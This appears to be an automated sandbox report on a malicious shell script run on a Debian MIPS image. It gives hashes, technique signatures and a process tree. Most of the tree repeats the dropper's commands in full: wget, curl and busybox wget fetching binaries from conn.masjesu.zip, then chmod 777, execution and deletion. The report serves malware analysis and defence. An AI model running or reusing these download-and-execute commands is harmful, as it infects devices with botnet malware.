Analysis
-
max time kernel
146s -
max time network
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
-
Size
10KB
-
MD5
4ea5706fdd75f148d2bf38bc0ca8bf54
-
SHA1
57a2af30643d8facb455bb90086386308bdbb582
-
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
-
SHA512
a5c858e9af5b42bd2697b799f540c3b6530a4ec5380ce173d60ec5beca09f09415ee0d614f4aa71a45fc2bb557c8293c214856b055e07317d64045d5959448f3
-
SSDEEP
96:YmWF4N4N4fw0n3LiLBoBkBoiYo75v5D5oP3uZLCaLsLJ6JyJDyunue0EQEMEQddm:yW8Q137Qdd3Ak8YHqa437Qddv8YHqa56
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 19 IoCs
Reads runtime system information
File opened for reading /proc/sys/crypto/fips_enabled by curl
-
System Network Configuration Discovery 1 TTPs 52 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh1⤵PID:693
-
/bin/rm/bin/rm bins.sh2⤵PID:698
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:703
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- System Network Configuration Discovery
PID:723
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:728
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:729
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- System Network Configuration Discovery
PID:732
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:735
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:736
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- System Network Configuration Discovery
PID:763
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:771
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:799
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- System Network Configuration Discovery
PID:815
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:836
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:853
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:915
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- System Network Configuration Discovery
PID:934
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97